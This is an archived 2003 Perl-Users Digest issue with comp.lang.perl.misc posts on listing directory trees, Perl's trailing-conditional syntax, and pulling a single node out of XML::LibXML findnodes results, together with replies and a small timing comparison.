Message-Id: <7a735a20.0302110949.5945cc1b@posting.google.com>

"J rgen Exner" <jurgenex@hotmail.com> wrote in message news:<a6_1a.19148$9y2.10282@nwrddc01.gnilink.net>...
> William English wrote:
> > I am doing this:
> >
> > @dirContents = `ls -R`;
> 
> And why on earth are you writing non-portable code that forks an external
> process instead of using Perl's buildin functions 'glob' or 'readdir' or
> even 'File::Find'?
> 
> Jue

This is a one-time use script. I need to write out to a file every
directory and file in a tree and do a comparison with another tree.
There is an nt tree and a unix tree. I need to determine if the file
or directory is <all> <nt> <unix> <ss6> or <hpx> and print those tags
before and after each element accordingly.

I am new to perl and didn't know any other way to do it. I'll looking
into glob, readdir, and File::Find. Thanks

William


------------------------------

Date: 11 Feb 2003 10:54:14 -0800
From: squillion@hotmail.com (squillion)
Subject: trailing conditional - apparently inconsistent syntax rules
Message-Id: <81016f2d.0302111054.8ef04fe@posting.google.com>

why can i say

  print "x" if $x;

but not

  if $x print "x";

why only in the latter case am i forced to enclose the conditional in
()s and the block in {}s like so:

  if ($x) {print "x"}

i demand a refund.


------------------------------

Date: 11 Feb 2003 11:23:57 -0500
From: jester@panix.com (Jesse Sheidlower)
Subject: XML parsing and array-context problem
Message-Id: <b2b82t$kkp$1@panix2.panix.com>

I'm having problems with some XML parsing. I've been
using the XML::LibXML module, which has proved easy
to use and rather fast (speed is extremely important
for this application; parsing the full range of
material here will take hours, and every little bit
helps), but I'm in a place where, even though something
works, I can't figure out how to do it in what should
be a better way.

I'm in an XML document that, at this node, looks like this:

<q id="1234"><foo>random stuff</foo>
  <qt>Stuff I <emph>want</emph> to get.</qt>
</q>

I know that there is always one and exactly one <qt> in a <q>.

The situation I'm in now is that I have a $q_node pointing
to the <q>; I want to get the <qt> thereunder and call
"toString" on it to get the actual XML of the <qt> (i.e. I'd
like to keep the <emph> or other tags, without bothering to
parse further down).

Here is code that _works_:

 foreach my $qt_node ($q_node->findnodes("qt")) {
	my $realquote = $qt_node->toString();
	print "RealQuote is: $realquote\n";
      }

However, since I know that there's exactly one <qt> here, I
don't want to have to have the loop just to get the one value,
but I don't know how to get rid of it.

The docs for the findnodes method say:

	 findnodes performs the xpath statement on the current
         node and returns the result as an array. In scalar
         context returns a XML::LibXML::NodeList object.

If findnodes really does return an array in list context,
I thought I should be able to do something like

 my $qt_node = ($q_node->findnodes("qt"))[0];

but this gives a syntax errror. Other solutions also fail; for example

  my @qt_node = $q_node->findnodes("qt");
  my $realquote = $qt_node[0]->toString(); 

returns nothing, so I get a "Can't call toString on undefined value" error.

I have similar problems in other parts of the program where I also
know I'm going to get a single node, but need the foreach to get it
out.

Thanks for any suggestions.

Jesse Sheidlower


------------------------------

Date: Tue, 11 Feb 2003 12:56:43 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: XML parsing and array-context problem
Message-Id: <3E49395B.5DE82FE0@earthlink.net>

Jesse Sheidlower wrote:
> 
> I'm having problems with some XML parsing. I've been
> using the XML::LibXML module, which has proved easy
> to use and rather fast (speed is extremely important
> for this application; parsing the full range of
> material here will take hours, and every little bit
> helps), but I'm in a place where, even though something
> works, I can't figure out how to do it in what should
> be a better way.
> 
> I'm in an XML document that, at this node, looks like this:
> 
> <q id="1234"><foo>random stuff</foo>
>   <qt>Stuff I <emph>want</emph> to get.</qt>
> </q>
> 
> I know that there is always one and exactly one <qt> in a <q>.
> 
> The situation I'm in now is that I have a $q_node pointing
> to the <q>; I want to get the <qt> thereunder and call
> "toString" on it to get the actual XML of the <qt> (i.e. I'd
> like to keep the <emph> or other tags, without bothering to
> parse further down).
> 
> Here is code that _works_:
> 
>  foreach my $qt_node ($q_node->findnodes("qt")) {
>         my $realquote = $qt_node->toString();
>         print "RealQuote is: $realquote\n";
>       }
> 
> However, since I know that there's exactly one <qt> here, I
> don't want to have to have the loop just to get the one value,
> but I don't know how to get rid of it.
> 
> The docs for the findnodes method say:
> 
>          findnodes performs the xpath statement on the current
>          node and returns the result as an array. In scalar
>          context returns a XML::LibXML::NodeList object.
> 
> If findnodes really does return an array in list context,
> I thought I should be able to do something like
> 
>  my $qt_node = ($q_node->findnodes("qt"))[0];
> 
> but this gives a syntax errror.

A *syntax* error?  It looks like perfectly valid perl code to me.

Are you *sure* about that?  Could you copy&paste the code and the error?

> Other solutions also fail; for example
> 
>   my @qt_node = $q_node->findnodes("qt");
>   my $realquote = $qt_node[0]->toString();
> 
> returns nothing, so I get a "Can't call toString on undefined value"
> error.

How about:

   my ($qt_node) = $q_node->findnodes("qt");
   my $realquote = $qt_node->toString;

or:

   my ($realquote) = map $_->toString, $q_node->findnodes("qt");

> I have similar problems in other parts of the program where I also
> know I'm going to get a single node, but need the foreach to get it
> out.

Could you post a minimal, but complete, perl program which demonstrates
your problem?  Include a little bit of data using the __DATA__ token and
the DATA filehandle.

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: 11 Feb 2003 13:37:10 -0500
From: jester@panix.com (Jesse Sheidlower)
Subject: Re: XML parsing and array-context problem
Message-Id: <b2bfsm$eu5$1@panix2.panix.com>

In article <3E49395B.5DE82FE0@earthlink.net>,
Benjamin Goldberg  <goldbb2@earthlink.net> wrote:
>Jesse Sheidlower wrote:
>> 
>> If findnodes really does return an array in list context,
>> I thought I should be able to do something like
>> 
>>  my $qt_node = ($q_node->findnodes("qt"))[0];
>> 
>> but this gives a syntax errror.
>
>A *syntax* error?  It looks like perfectly valid perl code to me.
>
>Are you *sure* about that?  Could you copy&paste the code and the error?

I thought I had gotten a syntax error before, but that must have been
for other variants. This time through, it returned nothing which
then caused the toString method to die.

[...]

>> I have similar problems in other parts of the program where I also
>> know I'm going to get a single node, but need the foreach to get it
>> out.
>
>Could you post a minimal, but complete, perl program which demonstrates
>your problem?  Include a little bit of data using the __DATA__ token and
>the DATA filehandle.

Aach, that helped solve it! My minimal test program worked fine, and I
worked through it and realized that the problem was one level up;
the part that grabbed the $q_node was also getting things at the same
level that were not <q>'s. When I fixed the XPath request to ensure I 
only got <q>'s everything got better.

However, there's still an unexpected timing issue. The version with
the foreach is actually slightly _faster_. On a run of some sample
data, about 5M with a total of about 19,000 <q> sections, doing

      foreach my $qt_node ($q_node->findnodes("qt")) {
        my $realquote = $qt_node->toString();
	print "RealQuote is: $realquote\n";
      }

took 1m23.2s, but doing

     my $qt_node = ($q_node->findnodes("qt"))[0];
     my $realquote = $qt_node->toString();
     print "RealQuote is: $realquote\n";

took 1m24.4s. (This is with a bunch of other parsing happening
as well.) Hmm.

Thank you for the guidance.

Jesse Sheidlower


------------------------------

Date: 11 Feb 2003 18:51:33 GMT
From: anno4000@lublin.zrz.tu-berlin.de (Anno Siegel)
Subject: Re: XML parsing and array-context problem
Message-Id: <b2bgnl$fmu$1@mamenchi.zrz.TU-Berlin.DE>

Jesse Sheidlower <jester@panix.com> wrote in comp.lang.perl.misc:

[snip]
 
> I'm in an XML document that, at this node, looks like this:
> 
> <q id="1234"><foo>random stuff</foo>
>   <qt>Stuff I <emph>want</emph> to get.</qt>
> </q>
> 
> I know that there is always one and exactly one <qt> in a <q>.
> 
> The situation I'm in now is that I have a $q_node pointing
> to the <q>; I want to get the <qt> thereunder and call
> "toString" on it to get the actual XML of the <qt> (i.e. I'd
> like to keep the <emph> or other tags, without bothering to
> parse further down).
> 
> Here is code that _works_:
> 
>  foreach my $qt_node ($q_node->findnodes("qt")) {
> 	my $realquote = $qt_node->toString();
> 	print "RealQuote is: $realquote\n";
>       }
> 
> However, since I know that there's exactly one <qt> here, I
> don't want to have to have the loop just to get the one value,
> but I don't know how to get rid of it.

Benjamin Goldberg has already given a good reply.  I'd just like to
add that there's absolutely nothing wrong with a one-shot loop like
yours (except for the placement of the final "}").  You'd have to do
something to isolate the single value, which the loop does nicely for
you.  The alternatives you and Benjamin are discussing show the fact
that only one value is expected more clearly, but from a coding point
of view the loop seems natural.

Anno


------------------------------

Date: Tue, 11 Feb 2003 14:14:08 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: XML parsing and array-context problem
Message-Id: <3E494B80.220C3F61@earthlink.net>

Jesse Sheidlower wrote:
[snip]
> However, there's still an unexpected timing issue. The version with
> the foreach is actually slightly _faster_. On a run of some sample
> data, about 5M with a total of about 19,000 <q> sections, doing
> 
>       foreach my $qt_node ($q_node->findnodes("qt")) {
>         my $realquote = $qt_node->toString();
>         print "RealQuote is: $realquote\n";
>       }
> 
> took 1m23.2s, but doing
> 
>      my $qt_node = ($q_node->findnodes("qt"))[0];
>      my $realquote = $qt_node->toString();
>      print "RealQuote is: $realquote\n";
> 
> took 1m24.4s. (This is with a bunch of other parsing happening
> as well.) Hmm.

Try this for speed:

  print "RealQuote is: ",
     ($q_node->findnodes("qt"))[0]->toString, "\n";

Also, perhaps more importantly, try profiling your code, and seeing what
parts of the code are slowing you down much.  The difference between
your two versions of code is a mere one percent ... not a significant
difference, imho.

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: 6 Apr 2001 21:33:47 GMT (Last modified)
From: Perl-Users-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin) 
Subject: Digest Administrivia (Last modified: 6 Apr 01)
Message-Id: <null>


Administrivia:

The Perl-Users Digest is a retransmission of the USENET newsgroup
comp.lang.perl.misc.  For subscription or unsubscription requests, send
the single line:

	subscribe perl-users
or:
	unsubscribe perl-users

to almanac@ruby.oce.orst.edu.  

To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.

To request back copies (available for a week or so), send your request
to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
where x is the volume number and y is the issue number.

For other requests pertaining to the digest, send mail to
perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
sending perl questions to the -request address, I don't have time to
answer them even if I did know the answer.


------------------------------
End of Perl-Users Digest V10 Issue 4550
***************************************

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[22329] in Perl-Users-Digest

Perl-Users Digest, Issue: 4550 Volume: 10

daemon@ATHENA.MIT.EDU (Perl-Users Digest)Tue Feb 11 14:06:20 2003

daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Tue Feb 11 14:06:20 2003